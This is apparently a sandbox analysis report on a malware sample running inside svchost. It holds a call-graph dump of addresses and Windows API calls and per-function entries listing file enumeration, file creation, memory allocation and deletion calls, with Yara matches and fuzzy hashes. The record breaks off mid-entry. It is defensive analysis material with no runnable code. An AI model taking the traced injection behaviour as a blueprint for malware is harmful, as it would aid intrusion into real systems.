7d45a0 LdrInitializeThunk 100523->100567 100526 7c7eb0 LdrInitializeThunk 100524->100526 100531 7cb279 100526->100531 100531->100508 100532 7cb242 100557 7d83f0 100532->100557 100534 7cb25c 100562 7d8550 100534->100562 100537 7d953d 100536->100537 100538 7d954e CreateProcessInternalW 100537->100538 100538->100513 100540 7dc440 100539->100540 100541 7dc49d 100540->100541 100568 7db2c0 100540->100568 100541->100515 100543 7dc47a 100571 7db1e0 100543->100571 100547 7c58fe 100545->100547 100580 7d89a0 100545->100580 100547->100523 100549 7c7ec3 100548->100549 100586 7d86d0 100549->100586 100551 7c7eee 100551->100508 100553 7d83bd 100552->100553 100554 7d836b 100552->100554 100592 35739b0 LdrInitializeThunk 100553->100592 100554->100532 100555 7d83df 100555->100532 100558 7d8470 100557->100558 100560 7d841e 100557->100560 100593 3574340 LdrInitializeThunk 100558->100593 100559 7d8492 100559->100534 100560->100534 100563 7d85cd 100562->100563 100565 7d857b 100562->100565 100594 3572fb0 LdrInitializeThunk 100563->100594 100564 7d85ef 100564->100524 100565->100524 100567->100522 100574 7d9460 100568->100574 100570 7db2db 100570->100543 100577 7d94a0 100571->100577 100573 7db1f9 100573->100541 100575 7d947a 100574->100575 100576 7d9488 RtlAllocateHeap 100575->100576 100576->100570 100578 7d94ba 100577->100578 100579 7d94c8 RtlFreeHeap 100578->100579 100579->100573 100581 7d8a51 100580->100581 100583 7d89cf 100580->100583 100585 3572d10 LdrInitializeThunk 100581->100585 100582 7d8a93 100582->100547 100583->100547 100585->100582 100587 7d874e 100586->100587 100589 7d86fb 100586->100589 100591 3572dd0 LdrInitializeThunk 100587->100591 100588 7d8770 100588->100551 100589->100551 100591->100588 100592->100555 100593->100559 100594->100564 100797 7c6b20 100798 7c6b4a 100797->100798 100801 7c7ce0 100798->100801 100800 7c6b74 100802 7c7cfd 100801->100802 100808 7d88c0 100802->100808 100804 7c7d4d 100805 7c7d54 100804->100805 100806 7d89a0 LdrInitializeThunk 100804->100806 100805->100800 100807 7c7d7d 100806->100807 100807->100800 100809 7d88ee 100808->100809 100810 7d895e 100808->100810 100809->100804 100813 3572f30 LdrInitializeThunk 100810->100813 100811 7d8994 100811->100804 100813->100811 100814 7cc3a0 100816 7cc3c9 100814->100816 100815 7cc4cd 100816->100815 100817 7cc473 FindFirstFileW 100816->100817 100817->100815 100819 7cc48e 100817->100819 100818 7cc4b4 FindNextFileW 100818->100819 100820 7cc4c6 FindClose 100818->100820 100819->100818 100820->100815 100595 7d18e0 100596 7d18f9 100595->100596 100597 7d1941 100596->100597 100600 7d1981 100596->100600 100602 7d1986 100596->100602 100598 7db1e0 RtlFreeHeap 100597->100598 100599 7d1951 100598->100599 100601 7db1e0 RtlFreeHeap 100600->100601 100601->100602 100826 7c71a2 100827 7c7134 100826->100827 100828 7c71b0 100826->100828 100829 7cb030 9 API calls 100827->100829 100830 7c7152 100827->100830 100829->100830 100608 7c2e63 100613 7c7b30 100608->100613 100611 7c2e8f 100612 7d9150 NtClose 100612->100611 100614 7c7b4a 100613->100614 100618 7c2e73 100613->100618 100619 7d8870 100614->100619 100617 7d9150 NtClose 100617->100618 100618->100611 100618->100612 100620 7d888d 100619->100620 100623 35735c0 LdrInitializeThunk 100620->100623 100621 7c7c1a 100621->100617 100623->100621 100624 7d10de 100636 7d8fc0 100624->100636 100626 7d10ff 100627 7d111d 100626->100627 100628 7d1132 100626->100628 100629 7d9150 NtClose 100627->100629 100630 7d9150 NtClose 100628->100630 100631 7d1126 100629->100631 100633 7d113b 100630->100633 100632 7d1172 100633->100632 100634 7db1e0 RtlFreeHeap 100633->100634 100635 7d1166 100634->100635 100637 7d9067 100636->100637 100639 7d8feb 100636->100639 100638 7d907a NtReadFile 100637->100638 100638->100626 100639->100626 100641 7c85d7 100642 7c85da 100641->100642 100644 7c8591 100642->100644 100645 7c6d40 LdrInitializeThunk LdrInitializeThunk 100642->100645 100645->100644 100646 7d8e50 100647 7d8f0a 100646->100647 100649 7d8e82 100646->100649 100648 7d8f1d NtCreateFile 100647->100648 100650 7d1550 100651 7d156c 100650->100651 100652 7d15a8 100651->100652 100653 7d1594 100651->100653 100655 7d9150 NtClose 100652->100655 100654 7d9150 NtClose 100653->100654 100656 7d159d 100654->100656 100657 7d15b1 100655->100657 100660 7db300 RtlAllocateHeap 100657->100660 100659 7d15bc 100660->100659 100831 7d5e90 100832 7d5eea 100831->100832 100834 7d5ef7 100832->100834 100835 7d38a0 100832->100835 100836 7d38a3 100835->100836 100837 7db150 NtAllocateVirtualMemory 100836->100837 100839 7d38e1 100837->100839 100838 7d39ee 100838->100834 100839->100838 100840 7c42c0 LdrLoadDll 100839->100840 100842 7d3927 100840->100842 100841 7d3970 Sleep 100841->100842 100842->100838 100842->100841 100663 7b9bc0 100666 7b9c02 100663->100666 100665 7ba2de 100666->100665 100667 7dae40 100666->100667 100668 7dae66 100667->100668 100673 7b41d0 100668->100673 100670 7dae72 100671 7daeab 100670->100671 100676 7d5420 100670->100676 100671->100665 100680 7c2f70 100673->100680 100675 7b41dd 100675->100670 100677 7d5482 100676->100677 100679 7d548f 100677->100679 100691 7c1740 100677->100691 100679->100671 100681 7c2f8d 100680->100681 100683 7c2fa3 100681->100683 100684 7d9b70 100681->100684 100683->100675 100686 7d9b8a 100684->100686 100685 7d9bb9 100685->100683 100686->100685 100687 7d87d0 LdrInitializeThunk 100686->100687 100688 7d9c16 100687->100688 100689 7db1e0 RtlFreeHeap 100688->100689 100690 7d9c2f 100689->100690 100690->100683 100692 7c177b 100691->100692 100707 7c7c40 100692->100707 100694 7c1783 100695 7db2c0 RtlAllocateHeap 100694->100695 100705 7c1a60 100694->100705 100696 7c1799 100695->100696 100697 7db2c0 RtlAllocateHeap 100696->100697 100698 7c17aa 100697->100698 100699 7db2c0 RtlAllocateHeap 100698->100699 100701 7c17bb 100699->100701 100706 7c185b 100701->100706 100722 7c67b0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100701->100722 100702 7c42c0 LdrLoadDll 100703 7c1a12 100702->100703 100718 7d7d60 100703->100718 100705->100679 100706->100702 100708 7c7c6c 100707->100708 100709 7c7b30 2 API calls 100708->100709 100710 7c7c8f 100709->100710 100711 7c7cb1 100710->100711 100713 7c7c99 100710->100713 100712 7c7ccd 100711->100712 100716 7d9150 NtClose 100711->100716 100712->100694 100714 7c7ca4 100713->100714 100715 7d9150 NtClose 100713->100715 100714->100694 100715->100714 100717 7c7cc3 100716->100717 100717->100694 100719 7d7dc2 100718->100719 100721 7d7dcf 100719->100721 100723 7c1a70 100719->100723 100721->100705 100722->100706 100739 7c7f10 100723->100739 100725 7c1fdd 100725->100721 100726 7c1a90 100726->100725 100743 7d0f20 100726->100743 100729 7c1caa 100731 7dc4d0 2 API calls 100729->100731 100730 7c1aee 100730->100725 100746 7dc3a0 100730->100746 100733 7c1cbf 100731->100733 100732 7c7eb0 LdrInitializeThunk 100735 7c1d0c 100732->100735 100733->100735 100751 7c05a0 100733->100751 100735->100725 100735->100732 100736 7c05a0 LdrInitializeThunk 100735->100736 100736->100735 100737 7c1e60 100737->100735 100738 7c7eb0 LdrInitializeThunk 100737->100738 100738->100737 100740 7c7f1d 100739->100740 100741 7c7f3e SetErrorMode 100740->100741 100742 7c7f45 100740->100742 100741->100742 100742->100726 100745 7d0f41 100743->100745 100755 7db150 100743->100755 100745->100730 100747 7dc3b6 100746->100747 100748 7dc3b0 100746->100748 100749 7db2c0 RtlAllocateHeap 100747->100749 100748->100729 100750 7dc3dc 100749->100750 100750->100729 100752 7c05bb 100751->100752 100762 7d93d0 100752->100762 100758 7d92b0 100755->100758 100757 7db181 100757->100745 100759 7d9345 100758->100759 100761 7d92db 100758->100761 100760 7d9358 NtAllocateVirtualMemory 100759->100760 100760->100757 100761->100757 100763 7d93ed 100762->100763 100766 3572c70 LdrInitializeThunk 100763->100766 100764 7c05c2 100764->100737 100766->100764 100848 7bb280 100849 7db150 NtAllocateVirtualMemory 100848->100849 100850 7bc8f1 100849->100850 100767 7c5940 100768 7c7eb0 LdrInitializeThunk 100767->100768 100771 7c5970 100768->100771 100770 7c59ba 100771->100770 100772 7c599c 100771->100772 100773 7c7e30 100771->100773 100774 7c7e74 100773->100774 100775 7c7e95 100774->100775 100780 7d84a0 100774->100780 100775->100771 100777 7c7e85 100778 7c7ea1 100777->100778 100779 7d9150 NtClose 100777->100779 100778->100771 100779->100775 100781 7d8520 100780->100781 100783 7d84ce 100780->100783 100785 3574650 LdrInitializeThunk 100781->100785 100782 7d8542 100782->100777 100783->100777 100785->100782 100851 7cf600 100852 7cf664 100851->100852 100853 7c6050 2 API calls 100852->100853 100855 7cf797 100853->100855 100854 7cf79e 100855->100854 100880 7c6160 100855->100880 100857 7cf943 100858 7cf81a 100858->100857 100859 7cf952 100858->100859 100884 7cf3e0 100858->100884 100860 7d9150 NtClose 100859->100860 100862 7cf95c 100860->100862 100863 7cf856 100863->100859 100864 7cf861 100863->100864 100865 7db2c0 RtlAllocateHeap 100864->100865 100866 7cf88a 100865->100866 100867 7cf8a9 100866->100867 100868 7cf893 100866->100868 100893 7cf2d0 CoInitialize 100867->100893 100869 7d9150 NtClose 100868->100869 100871 7cf89d 100869->100871 100872 7cf8b7 100896 7d8c30 100872->100896 100874 7cf932 100875 7d9150 NtClose 100874->100875 100876 7cf93c 100875->100876 100877 7db1e0 RtlFreeHeap 100876->100877 100877->100857 100878 7cf8d5 100878->100874 100879 7d8c30 LdrInitializeThunk 100878->100879 100879->100878 100881 7c6185 100880->100881 100900 7d8ae0 100881->100900 100885 7cf3fc 100884->100885 100886 7c42c0 LdrLoadDll 100885->100886 100888 7cf41a 100886->100888 100887 7cf423 100887->100863 100888->100887 100889 7c42c0 LdrLoadDll 100888->100889 100890 7cf4ee 100889->100890 100891 7c42c0 LdrLoadDll 100890->100891 100892 7cf548 100890->100892 100891->100892 100892->100863 100895 7cf335 100893->100895 100894 7cf3cb CoUninitialize 100894->100872 100895->100894 100897 7d8c4a 100896->100897 100905 3572ba0 LdrInitializeThunk 100897->100905 100898 7d8c77 100898->100878 100901 7d8afd 100900->100901 100904 3572c60 LdrInitializeThunk 100901->100904 100902 7c61f9 100902->100858 100904->100902 100905->100898 100906 7cff00 100907 7cff23 100906->100907 100908 7c42c0 LdrLoadDll 100907->100908 100909 7cff47 100908->100909 100910 7c6f00 100911 7c6f1c 100910->100911 100915 7c6f6f 100910->100915 100913 7d9150 NtClose 100911->100913 100911->100915 100912 7c70a7 100914 7c6f37 100913->100914 100920 7c62e0 NtClose LdrInitializeThunk LdrInitializeThunk 100914->100920 100915->100912 100921 7c62e0 NtClose LdrInitializeThunk LdrInitializeThunk 100915->100921 100917 7c7081 100917->100912 100922 7c64b0 NtClose LdrInitializeThunk LdrInitializeThunk 100917->100922 100920->100915 100921->100917 100922->100912 100923 7c0b00 100924 7c0b1a 100923->100924 100925 7c42c0 LdrLoadDll 100924->100925 100926 7c0b38 100925->100926 100927 7c0b6c PostThreadMessageW 100926->100927 100928 7c0b7d 100926->100928 100927->100928 100929 7cab00 100934 7ca810 100929->100934 100931 7cab0d 100946 7ca490 100931->100946 100933 7cab29 100935 7ca835 100934->100935 100936 7ca983 100935->100936 100956 7d3180 100935->100956 100936->100931 100938 7ca99a 100938->100931 100939 7ca991 100939->100938 100941 7caa87 100939->100941 100971 7c9ee0 100939->100971 100943 7caaea 100941->100943 100980 7ca250 100941->100980 100944 7db1e0 RtlFreeHeap 100943->100944 100945 7caaf1 100944->100945 100945->100931 100947 7ca4a6 100946->100947 100953 7ca4b1 100946->100953 100948 7db2c0 RtlAllocateHeap 100947->100948 100948->100953 100949 7ca4d2 100949->100933 100950 7ca7e2 100951 7ca7fb 100950->100951 100952 7db1e0 RtlFreeHeap 100950->100952 100951->100933 100952->100951 100953->100949 100953->100950 100954 7c9ee0 RtlFreeHeap 100953->100954 100955 7ca250 RtlFreeHeap 100953->100955 100954->100953 100955->100953 100957 7d318e 100956->100957 100958 7d3195 100956->100958 100957->100939 100959 7c42c0 LdrLoadDll 100958->100959 100960 7d31ca 100959->100960 100961 7d31d9 100960->100961 100984 7d2c40 LdrLoadDll 100960->100984 100963 7db2c0 RtlAllocateHeap 100961->100963 100968 7d3384 100961->100968 100964 7d31f2 100963->100964 100965 7d337a 100964->100965 100967 7d320e 100964->100967 100964->100968 100966 7db1e0 RtlFreeHeap 100965->100966 100965->100968 100966->100968 100967->100968 100969 7db1e0 RtlFreeHeap 100967->100969 100968->100939 100970 7d336e 100969->100970 100970->100939 100972 7c9f06 100971->100972 100985 7cd910 100972->100985 100974 7c9f78 100975 7c9f96 100974->100975 100977 7ca100 100974->100977 100976 7ca0e5 100975->100976 100990 7c9da0 100975->100990 100976->100939 100977->100976 100978 7c9da0 RtlFreeHeap 100977->100978 100978->100977 100981 7ca276 100980->100981 100982 7cd910 RtlFreeHeap 100981->100982 100983 7ca2fd 100982->100983 100983->100941 100984->100961 100987 7cd934 100985->100987 100986 7cd941 100986->100974 100987->100986 100988 7db1e0 RtlFreeHeap 100987->100988 100989 7cd984 100988->100989 100989->100974 100991 7c9dbd 100990->100991 100994 7cd9a0 100991->100994 100993 7c9ec3 100993->100975 100995 7cd9c4 100994->100995 100996 7cda6e 100995->100996 100997 7db1e0 RtlFreeHeap 100995->100997 100996->100993 100997->100996 100998 7dc400 100999 7db1e0 RtlFreeHeap 100998->100999 101000 7dc415 100999->101000 101001 7d8600 101002 7d8692 101001->101002 101003 7d862e 101001->101003 101006 3572ee0 LdrInitializeThunk 101002->101006 101004 7d86c0 101006->101004 101007 7d8780 101008 7d879d 101007->101008 101011 3572df0 LdrInitializeThunk 101008->101011 101009 7d87c2 101011->101009

                                                                                                                                Executed Functions

                                                                                                                                Function 007CC3A0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 007CC484
                                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 007CC4BF
                                                                                                                                • FindClose.KERNELBASE(?), ref: 007CC4CA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                • Opcode ID: 2b64eb2928cc5b1944b9f56013d7d6aeaee1ce2181abdc24f400fb93738e2edf
                                                                                                                                • Instruction ID: d5d302d65e1b215b2a288e7d92b40ee3c65cd709ee4cc5251a2fecbf17fe1a04
                                                                                                                                • Opcode Fuzzy Hash: 2b64eb2928cc5b1944b9f56013d7d6aeaee1ce2181abdc24f400fb93738e2edf
                                                                                                                                • Instruction Fuzzy Hash: 2531A172900298BBDB25DBA0CC89FFF777CAF44745F10449DF90CA6191DA74AB858BA0
                                                                                                                                Function 007D8E50 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,1864B88E,?,?), ref: 007D8F4E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 823142352-0
                                                                                                                                • Opcode ID: c24f852a5a05263fa82ddd60a235b99f3fcb2b00884e91ce51f06d694029dd12
                                                                                                                                • Instruction ID: 2c8b8cbe3c2680e7ac56854dbb7435bd7976b088b9fb4e8157cda23ace8be685
                                                                                                                                • Opcode Fuzzy Hash: c24f852a5a05263fa82ddd60a235b99f3fcb2b00884e91ce51f06d694029dd12
                                                                                                                                • Instruction Fuzzy Hash: 7231C2B5A00248AFCB14DF99C881EEEB7B9EF88300F508619F919A7344D734A911CFA5
                                                                                                                                Function 007D8FC0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,1864B88E), ref: 007D90A3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FileRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                • Opcode ID: c7ec65dbe847129dae18479642e5c0b22711648c0a0c7b1f9475e5c277fa4d88
                                                                                                                                • Instruction ID: e752d5889df4a4030fdf15b258fb4c74d59531648f8f4eded7002f9dd08bbaf1
                                                                                                                                • Opcode Fuzzy Hash: c7ec65dbe847129dae18479642e5c0b22711648c0a0c7b1f9475e5c277fa4d88
                                                                                                                                • Instruction Fuzzy Hash: FB31F6B5A00248AFCB14DF98C841EEFB7B9EF88304F108619F919A7345D774A911CFA1
                                                                                                                                Function 007D92B0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • NtAllocateVirtualMemory.NTDLL(007C1AEE,?,007D7DCF,00000000,00000004,00003000,?,?,?,?,?,007D7DCF,007C1AEE), ref: 007D9375
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                • Opcode ID: d24d7489f34dda0f62bfdf744e8e1e84ae437e7e7a432dbf1f54f11caae97b18
                                                                                                                                • Instruction ID: 9e9041e6d87249d58ecd85f15ce4c9060b6b9554ac2a3886f51b659ad7dac5e6
                                                                                                                                • Opcode Fuzzy Hash: d24d7489f34dda0f62bfdf744e8e1e84ae437e7e7a432dbf1f54f11caae97b18
                                                                                                                                • Instruction Fuzzy Hash: 8221F7B5A00208AFDB14DF98CC45EEF77B9EF88700F10461AF919A7281D774A911CBA5
                                                                                                                                Function 007D90B0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: DeleteFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                • Opcode ID: bb2156a930fcda6a2dd67b11b201b524c73f67881e9d55ed75918eaa45964ca6
                                                                                                                                • Instruction ID: b98e8976f46aabb49ac809c58e38b1a468eb4b7d0f18e7023efeb6a9975b9b32
                                                                                                                                • Opcode Fuzzy Hash: bb2156a930fcda6a2dd67b11b201b524c73f67881e9d55ed75918eaa45964ca6
                                                                                                                                • Instruction Fuzzy Hash: 7F115E71600208BFD720EB69CC06FEB77BCEF85704F50851DFA09A7281E7B56A058BA5
                                                                                                                                Function 007D9150 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 007D9184
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Close
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                • Opcode ID: e2330e1e311a6ff0016a626a075a4b11d39da747239e512168a5ca50c78264f5
                                                                                                                                • Instruction ID: b686ec21bbf7e1c7fd8914652d81ad371038738840bf086f42187bd67a713673
                                                                                                                                • Opcode Fuzzy Hash: e2330e1e311a6ff0016a626a075a4b11d39da747239e512168a5ca50c78264f5
                                                                                                                                • Instruction Fuzzy Hash: 58E04636200204BFD620FA5ADC45FAB776CEBC6760F408416FA1CA7242D671B90086F0
                                                                                                                                Function 03574340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 663ba2ca6556a154c2dc122cf02178b7a890628afd0aaab7784bfa8ced465476
                                                                                                                                • Instruction ID: 79c36234720274889e510d8a999a0b7425fa70a0e924b407cdc8139bfc2788b4
                                                                                                                                • Opcode Fuzzy Hash: 663ba2ca6556a154c2dc122cf02178b7a890628afd0aaab7784bfa8ced465476
                                                                                                                                • Instruction Fuzzy Hash: 86900231705804129140B25858C45864046E7E0311B99C011E4425559C8B148A565361
                                                                                                                                Function 03574650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: d62b8dc2a93950c841b4bb49021e758ec2c8099ece53ed4989248a87205dbd56
                                                                                                                                • Instruction ID: 1cdd0faeda76bb7300b6d1cc02c03c9f7f8ea72854ff8eb6bf320c4417342635
                                                                                                                                • Opcode Fuzzy Hash: d62b8dc2a93950c841b4bb49021e758ec2c8099ece53ed4989248a87205dbd56
                                                                                                                                • Instruction Fuzzy Hash: 29900261701504424140B25858444466046E7E13113D9C115A4555565C871889559269
                                                                                                                                Function 03572B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 6a8905976415fcc6c7416a0814b0aee926e7f0e0d53648d577d0a993153a632d
                                                                                                                                • Instruction ID: 457c78abb18feeb14149725498e1d226c4b2eaf328586fb1b4f1f17e32bb03f2
                                                                                                                                • Opcode Fuzzy Hash: 6a8905976415fcc6c7416a0814b0aee926e7f0e0d53648d577d0a993153a632d
                                                                                                                                • Instruction Fuzzy Hash: DA900261302404034105B2585454656404BD7E0311B99C021E5015595DC62589916125
                                                                                                                                Function 03572BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: aecd7f88243f29b6cd407874b902b30b057c76207dbb9c0468c5112da7000b44
                                                                                                                                • Instruction ID: b3436e42d3914cf4c4cb3cffb2d4153c9b23ff6f79605a2cb47885fd604d6d6c
                                                                                                                                • Opcode Fuzzy Hash: aecd7f88243f29b6cd407874b902b30b057c76207dbb9c0468c5112da7000b44
                                                                                                                                • Instruction Fuzzy Hash: 9790023130140C02D180B258544468A0046D7D1311FD9C015A4026659DCB158B5977A1
                                                                                                                                Function 03572BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: fc01f1a61899e8641ba18a06eb7508c983c62ec380395e250a57f386bca51718
                                                                                                                                • Instruction ID: feb61bbf589ed7805aec5d32ddd0d2438b9dcaf2427a6c7edc2e677004227c0c
                                                                                                                                • Opcode Fuzzy Hash: fc01f1a61899e8641ba18a06eb7508c983c62ec380395e250a57f386bca51718
                                                                                                                                • Instruction Fuzzy Hash: BD90023130544C42D140B2585444A860056D7D0315F99C011A4065699D97258E55B661
                                                                                                                                Function 03572BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: dfa9a5f5860a7941eecd4de34c7f4d36b4a3187a52665dae140885d0e2d1378d
